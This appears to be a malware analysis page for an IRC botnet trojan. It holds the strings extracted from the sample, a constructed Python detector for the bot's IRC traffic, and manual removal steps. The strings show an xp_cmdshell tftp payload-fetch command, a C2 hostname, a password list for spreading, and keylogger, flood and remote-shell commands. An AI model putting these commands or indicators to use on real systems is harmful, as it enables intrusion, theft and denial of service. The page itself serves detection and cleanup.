Icmp.dll failed. <%d>
Netapi32.dll failed. <%d>
Dnsapi.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Mpr32.dll failed. <%d>
Shell32.dll failed. <%d>
Odbc32.dll failed. <%d>
Avicap32.dll failed. <%d>
Windows for Workgroups 3.1a
WinXP Professional [universal] lsass.exe
Win2k Professional [universal] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
tftp -i %s get %s
\\%s\ipc$
%s Error: %s <%d>.
explorer.exe
%s %s
%sdel.bat
del "%s"
%%comspec%% /c %s %s
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%sEXEC master..xp_cmdshell 'tftp -i %s GET %s'
EXEC master..xp_cmdshell '%s'
[%s]: Exploiting IP: (%s:%d) User: (%s/%s).
[NET]: %s service: '%s'.
[NET]: Error with service: '%s'. %s
[NET]: %s: No service specified.
The following Windows services are registered:
%s: %s (%s)
[NET]: %s share: '%s'.
[NET]: %s: Error with share: '%s'. %s
[NET]: %s: No share specified.
[NET]: Share list error: %s <%ld>
[NET]: %s username: '%s'.
[NET]: %s: Error with username: '%s'. %s
[NET]: %s: No username specified.
Account: %S
Full Name: %S
User Comment: %S
Comment: %S
Privilege Level: %s
Auth Flags: %d
Home Directory: %S
Parameters: %S
Password Age: %d
Bad Password Count: %d
Number of Logins: %d
Last Logon: %d
Last Logoff: %d
Logon Server: %S
Workstations: %S
Country Code: %d
User's Language: %d
Max. Storage: %d
Units Per Week: %d
[NET]: User list error: %s <%ld>
Total users found: %d.
This network request is not supported.
The operation is allowed only on the primary domain controller of the domain.
The password is shorter than required (or does not meet the password policy requirement.)
[NET]: %s <Server: %S> <Message: %S>
c$\windows\system32
%s\%s\%s
(no password)
[%s]: Exploiting IP: %s, Share: \%s, User: (%s/%s)
%s\ipc$
[FLUSHDNS]: Error getting ARP cache: <%d>.
[FLUSHDNS]: Not supported by this system.
[PING]: Error sending pings to %s.
[PING]: Finished sending pings to %s.
[UDP]: Error sending pings to %s.
[UDP]: Finished sending packets to %s.
%s (%d)
bot.neverup.asia
svchost.exe
system.txt
msconfig.dat
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunServices
password1
password
passwd
pass1234
1234567
12345678
123456789
1234567890
windows
login
loginpass
domainpass
domainpassword
dbpass
dbpassword
databasepass
databasepassword
sqlpassoainstall
winpass
%s %d "%s"
[IDENTD]: Server running on Port: 113.
[IDENTD]: Failed to start server, error: <%d>.
[MAIN]: Connected to %s.
PASS %s
NICK %s
USER %s 0 0 :%s
PONG %s
JOIN %s %s
USERHOST %s
MODE %s %s
[MAIN]: User %s logged out.
NOTICE %s :%s
NICK
:%s%s
[MAIN]: User: %s logged out.
[MAIN]: Joined channel: %s.
NOTICE %s :
VERSION %s
PING %s
[DCC]: Receive file: '%s' from user: %s.
[DCC]: Failed to start transfer thread, error: <%d>.
[DCC]: Receive file: '%s' failed from unauthorized user: %s.
[DCC]: Chat from user: %s.
[DCC]: Failed to start chat thread, error: <%d>.
[DCC]: Chat already active with user: %s.
[DCC]: Chat failed by unauthorized user: %s.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s :Your attempt has been logged.
[MAIN]: *Failed pass auth by: (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
[MAIN]: *Failed host auth by: (%s!%s).
[MAIN]: Password accepted.
[MAIN]: User: %s logged in.
$rndnick
rndnick
[MAIN]: Random nick change: %s
[MAIN]: No user logged in at slot: %d.
[MAIN]: Invalid login slot number: %d.
[MAIN]: %s
[SECURE]: %s system.
[SECURE]: Failed to start secure thread, error: <%d>.
[SOCKS4]: Server started on: %s:%d.
[SOCKS4]: Failed to start server thread, error: <%d>.
rloginstop
[RLOGIND]
httpstop
[HTTPD]
TCP redirect
ddos.stop
udpstop
UDP flood
tftpstop
[TFTP]
QUIT :%s
[MAIN]: Status: Ready. Bot Uptime: %s.
[MAIN]: Bot ID: %s.
[THREADS]: Failed to start list thread, error: <%d>.
[LOG]: Failed to start listing thread, error: <%d>.
[PROCS]: Failed to start listing thread, error: <%d>.
getcdkeys
[CDKEYS]: Search completed.
[MAIN]: Uptime: %s.
opencmd
ocmd
[CMD]: Remote shell already running.
[CMD]: Couldn't open remote shell.
[CMD]: Remote shell ready.
cmdstop
[CMD]
-[Login List]-
%d. %s
[MAIN]: Login list complete.
[FLUSHDNS]: Failed to load dnsapi.dll.
rloginserver
rlogin
[RLOGIND]: Server listening on IP: %s:%d, Username: %s.
[RLOGIND]: Failed to start server thread, error: <%d>.
httpserver
[HTTPD]: Failed to start server thread, error: <%d>.
tftpserver
tftp
[TFTP]: Already running.
[TFTP]: Failed to start server thread, error: <%d>.
findpass
[FINDPASS]: Searching for password.
[FINDPASS]: Failed to start search thread, error: <%d>.
nick
[MAIN]: Nick changed to: '%s'.
join
[MAIN]: Joined channel: '%s'.
PART %s
[MAIN]: Parted channel: '%s'.
[MAIN]: IRC Raw: %s.
[THREADS]: Stopped: %d thread(s).
[THREADS]: Killed thread: %s.
[THREADS]: Failed to kill thread: %s.
c_rndnick
[MAIN]: Prefix changed to: '%c'.
[SHELL]: File opened: %s
[SHELL]: Couldn't open file: %s
[MAIN]: Server changed to: '%s'.
[DNS]: Lookup: %s -> %s.
[PROC]: Process killed: %s
[PROC]: Failed to terminate process: %s
[PROC]: Process killed ID: %s
[PROC]: Failed to terminate process ID: %s
[FILE]: Deleted '%s'.
[DCC]: Send File: %s, User: %s.
[FILE]: List: %s
[VISIT]: URL: %s.
[VISIT]: Failed to start connection thread, error: <%d>.
mirccmd
[CMD]: Error sending to remote shell.
[CMD]: Commands: %s
[MAIN]: Read file complete: %s
[MAIN]: Read file failed: %s
[IDENT]: Server stopped. (%d thread(s) stopped.)
keylog
[KEYLOG]: Already running.
[KEYLOG]: Key logger active.
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[KEYLOG]: No key logger thread found.
[NET]: Failed to load advapi32.dll or netapi32.dll.
[CAPTURE]: Screen capture saved to: %s.
[CAPTURE]: Driver #%d - %s - %s.
[CAPTURE]: Webcam capture saved to: %s.
[CAPTURE]: Error while capturing from webcam.
[CAPTURE]: Invalid parameters for webcam capture.
[CAPTURE]: Amateur video saved to: %s.
[CAPTURE]: Error while capturing amateur video from webcam.
%s %s %s :%s
[MAIN]: Gethost: %s, Command: %s
[MAIN]: Gethost: %s.
[MAIN]: Alias added: %s.
privmsg
[MAIN]: Privmsg: %s: %s.
ACTION %s
[MAIN]: Action: %s: %s.
MODE %s
[MAIN]: Mode change: %s
[CLONE]: Raw (%s): %s
[CLONE]: Mode (%s): %s
c_nick
[CLONE]: Nick (%s): %s
c_join
[MAIN]: Repeat: %s
[MAIN]: Repeat not allowed in command line: %s
%s%s.exe
[UPDATE]: Downloading update from: %s.
[UPDATE]: Failed to start download thread, error: <%d>.
[EXEC]: Couldn't execute file.
[EXEC]: Commands: %s
[FINDFILE]: Searching for file: %s in: %s.
[FINDFILE]: Failed to start search thread, error: <%d>.
[FILE]: Rename: '%s' to: '%s'.
[ICMP]: Flooding: (%s) for %s seconds.
[ICMP]: Failed to start flood thread, error: <%d>.
[CLONES]: Created on %s:%d, in channel %s.
[CLONES]: Failed to start clone thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DDoS]: Failed to start flood thread, error: <%d>.
[SYN]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: <%d>.
[DOWNLOAD]: Downloading URL: %s to: %s.
[DOWNLOAD]: Failed to start transfer thread, error: <%d>.
[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.
[REDIRECT]: Failed to start redirection thread, error: <%d>.
[SCAN]: Port scan started: %s:%d with delay: %d(ms).
[SCAN]: Failed to start scan thread, error: <%d>.
c_privmsg
[%s] <%s> %s
[%s] * %s %s
[SCAN]: Already %d scanning threads. Too many specified.
[SCAN]: Failed to start scan, port is invalid.
[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
udpflood
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
[UDP]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[PING]: Failed to start flood thread, error: <%d>.
ICMP.dll not available
tcpflood
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Invalid flood type specified.
helo $rndnick
mail from: <%s>
rcpt to: <%s>
subject: %s
from: %s
[EMAIL]: Message sent to %s.
httpcon
[FTP]: File not found: %s.
%s\%i%i%i.dll
open %s
put %s
-s:%s
PTF.exe
[FTP]: Uploading file: %s to: %s
[FTP]: Uploading file: %s to: %s failed.
[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start client thread, error: <%d>.
[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.
[REDIRECT]: Failed to start connection thread, error: <%d>.
PRIVMSG %s :%s
[CMD]: Could not read data from proccess
[CMD]: Proccess has terminated.
[CMD]: Could not read data from proccess.
cmd.exe
[CMD]: Remote Command Prompt
[CMD]: Failed to start IO thread, error: <%d>.
[RLOGIND]: Error: getpeername(): <%d>.
[RLOGIND]: User logged in: <%s@%s>.
[RLOGIND]: Error: SessionRun(): <%d>.
[RLOGIND]: User logged out: <%s@%s>.
[RLOGIND]: Protocol string too long.
[RLOGIND]: Login rejected, Remote user: <%s@%s>.
[RLOGIND]: Error: WSAStartup(): <%d>.
[RLOGIND]: Failed to install control-C handler, error: <%d>.
[RLOGIND]: Ready and waiting for incoming connections.
[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.
[RLOGIND]: Failed to start client thread, error: <%d>.
[RLOGIND]: Error: server failed, returned: <%d>.
[%s]|
[%d]%s
[SCAN]: IP: %s Port: %d is open.
[SCAN]: Scanning IP: %s, Port: %d.
[SECURE]: Failed to open DCOM registry key.
[SECURE]: Failed to open IPC$ Restriction registry key.
[SECURE]: Advapi32.dll couldn't be loaded.
[SECURE]: Share '%S' deleted.
[SECURE]: Failed to delete '%S' share.
[SECURE]: Share '%s' deleted.
[SECURE]: Failed to delete '%s' share.
[SECURE]: Netapi32.dll couldn't be loaded.
[SECURE]: Failed to open IPC$ restriction registry key.
[SECURE]: Share '%s' added.
[SECURE]: Failed to add '%s' share.
[RLOGIND]: Failed to create ReadShell session thread, error: <%d>.
[RLOGIND]: WaitForMultipleObjects error: <%d>.
[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.
[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.
[RLOGIND]: Failed to execute shell.
cmd /q
[RLOGIND]: Failed to execute shell, error: <%d>.
[RLOGIND]: SessionReadShellThread exited, error: <%ld>.
tPTF.exe -i get
[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.
[SOCKS4]: Failed to start client thread, error: <%d>.
[SOCKS4]: Failed to start server on Port %d.
[SOCKS4]: Authentication failed. Remote userid: %s != %s.
[SOCKS4]: Error: Failed to open socket(), returned: <%d>.
[SOCKS4]: Error: Failed to connect to target, returned: <%d>.
[SYN]: Send error: <%d>.
Ý %dh %dm
%s (%s)
[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]: %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]: %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]: %s. [Uptime]: %s.
[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.
[TCP]: Error: socket() failed, returned: <%d>.
[TCP]: Error: setsockopt() failed, returned: <%d>.
[TCP]: Invalid target IP.
[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[TFTP]: Error: socket() failed, returned: <%d>.
[TFTP]: Failed to open file: %s.
[TFTP]: File not found: %s (%s).
[TFTP]: File transfer started to IP: %s (%s).
[TFTP]: File transfer complete to IP: %s (%s).
%s: %s stopped. (%d thread(s) stopped.)
%s: No %s thread found.
[VISIT]: Invalid URL.
[VISIT]: Failed to connect to HTTP server.
[VISIT]: URL visited.
[VISIT]: Failed to get requested URL from HTTP server.
[10-10-2016 05:13:03] [IDENTD]: Server running on Port: 113.
%System%\eohpsgi.exe
TransactNamedPipe
GetProcessHeap
PeekNamedPipe
CreatePipe
GetCPInfo
KERNEL32.dll
\C$\123456111111111111111.doc
127.0.0.1\IPC$\
Windows 2000 2195
Windows 2000 5.0
\\192.168.1.210\IPC$
\PIPE\
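Added example, not from the report or from the bot's source: a Python detector that walks a reassembled IRC stream and scores the indicators visible in the strings above: the fixed registration shape (PASS %s / NICK %s / USER %s 0 0 :%s), a keyed JOIN (JOIN %s %s), controller commands such as ddos.syn, udpflood, keylog and getcdkeys behind a one-character prefix (assumed to be '.', the configurable prefix implied by "Prefix changed to: '%c'"), and the bot's bracketed status replies ([MAIN]:, [DDoS]:, [KEYLOG]:). The two embedded streams are constructed; nick, channel, key and addresses are made up, and the weights and cut-off of 4 are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Command names and status-line tags are copied from the strings above.
BOT_COMMANDS = {
    "ddos.syn", "ddos.ack", "ddos.random", "ddos.stop", "udpflood", "udpstop",
    "tcpflood", "keylog", "getcdkeys", "findpass", "opencmd", "ocmd", "cmdstop",
    "rndnick", "tftpserver", "tftp", "tftpstop", "httpserver", "httpstop",
    "rloginserver", "rlogin", "rloginstop", "mirccmd", "httpcon"}
BOT_TAGS = {"MAIN", "DDoS", "SYN", "TCP", "UDP", "ICMP", "SCAN", "KEYLOG", "FINDPASS",
            "CDKEYS", "CMD", "DOWNLOAD", "UPDATE", "TFTP", "HTTPD", "RLOGIND", "SOCKS4",
            "IDENTD", "NET", "SECURE", "CAPTURE", "DCC", "PROC", "FILE", "VISIT"}
# The bot registers with the literal shape "USER <x> 0 0 :<x>" ("USER %s 0 0 :%s"
# above); ordinary clients send "USER <user> <mode> * :<realname>".
USER_RE = re.compile(r"^USER (\S+) 0 0 :(\S+)$")
JOIN_RE = re.compile(r"^JOIN (#\S+)(?: (\S+))?$")   # "JOIN %s %s": channel and key
MSG_RE = re.compile(r"^(?:PRIVMSG|NOTICE) (\S+) :(.*)$")
TAG_RE = re.compile(r"^\[([A-Za-z0-9]+)\]: ")      # bot replies look like "[MAIN]: ..."
CMD_RE = re.compile(r"^[^\w\s](\S+)")              # one-char command prefix, assumed '.'

# Constructed streams (nick, channel, key and addresses are made up), laid out
# with the bot's own registration strings; not captured traffic from the sample.
SAMPLE_STREAM = """\
PASS hunter2
NICK [XP|USA|12345]
USER kqzpw 0 0 :kqzpw
JOIN #ch4n k3y
:ctrl!op@example.net PRIVMSG #ch4n :.ddos.syn 203.0.113.9 80 600
:ctrl!op@example.net PRIVMSG #ch4n :.keylog on
:ctrl!op@example.net PRIVMSG #ch4n :.getcdkeys
PRIVMSG #ch4n :[DDoS]: Flooding: (203.0.113.9:80) for 600 seconds.
PRIVMSG #ch4n :[KEYLOG]: Key logger active.
"""
BENIGN_STREAM = """\
NICK alice
USER alice 0 * :Alice Example
JOIN #python
PRIVMSG #python :does anyone know how .format() handles nested braces?
"""


@dataclass
class IrcSession:
    nick: Optional[str] = None
    bot_style_user: bool = False
    channels: dict = field(default_factory=dict)      # channel -> key or None
    commands: list = field(default_factory=list)      # (target, command, [args])
    status_lines: list = field(default_factory=list)  # (tag, full text)

    def score(self):
        """Assumed weights: registration shape 2, keyed JOIN 1, 2 per known
        command (at most 3 counted), 1 per status line (at most 3 counted)."""
        s = 2 if self.bot_style_user else 0
        s += 1 if any(self.channels.values()) else 0
        s += 2 * min(len(self.commands), 3)
        s += min(len(self.status_lines), 3)
        return s

    @property
    def is_suspicious(self):
        return self.score() >= 4   # assumed cut-off: bot registration plus one command


def analyse_irc_stream(text):
    """Walk a reassembled IRC stream (both directions) and collect Rbot-style
    indicators. Server-originated lines carry ':prefix ', which is stripped so
    a controller's PRIVMSG parses the same way as the bot's own output."""
    sess = IrcSession()
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if line.startswith(":"):
            line = line.partition(" ")[2]
        if line.startswith("NICK "):
            sess.nick = line[5:].strip()
            continue
        if USER_RE.match(line):
            sess.bot_style_user = True
            continue
        m = JOIN_RE.match(line)
        if m:
            sess.channels[m.group(1)] = m.group(2)
            continue
        m = MSG_RE.match(line)
        if not m:
            continue
        target, body = m.group(1), m.group(2)
        tag = TAG_RE.match(body)
        if tag and tag.group(1) in BOT_TAGS:
            sess.status_lines.append((tag.group(1), body))
            continue
        cmd = CMD_RE.match(body)
        if cmd and cmd.group(1).lower() in BOT_COMMANDS:
            parts = body[1:].split()
            sess.commands.append((target, parts[0].lower(), parts[1:]))
    return sess


if __name__ == "__main__":
    for label, stream in (("sample", SAMPLE_STREAM), ("benign", BENIGN_STREAM)):
        s = analyse_irc_stream(stream)
        print(label, "score", s.score(), "suspicious", s.is_suspicious,
              "commands", [c[1] for c in s.commands])
```

Feed it the text of a reassembled TCP stream; the bot's server and port are configurable ("[MAIN]: Server changed to: '%s'."), so do not limit the capture to 6667. The registration shape alone is a weak signal, which is why the score needs a recognised command or status line on top of it before a session is called suspicious.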
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1756
eohpsgi.exe:1660
run.exe:1388
Uncrypted.exe:224
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\LOIC.exe (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uncrypted.exe (3878 bytes)
%System%\drivers\etc\hosts (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYZG96R\desktop.ini (67 bytes)
%System%\eohpsgi.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85IF8HAJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\7IQEU6O0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LTNDDR8Y\desktop.ini (67 bytes)
(The desktop.ini files are Internet Explorer cache index files created when the cache directories are initialised and are harmless; the hosts file must be restored, not deleted.)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.